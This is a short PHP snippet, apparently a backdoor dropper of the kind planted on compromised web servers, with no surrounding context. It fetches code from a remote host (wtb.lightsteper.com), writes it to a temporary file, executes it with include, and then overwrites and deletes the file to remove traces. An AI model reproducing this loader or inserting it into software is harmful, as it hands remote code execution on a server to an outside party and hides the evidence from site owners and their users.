<?php $z=file_get_contents('http://wtb.lightsteper.com/grr/gr.txt');  $ft=sys_get_temp_dir().'/etwrt'; @file_put_contents($ft,'<?php '.$z); include($ft); @file_put_contents($ft,'1'); @unlink($ft);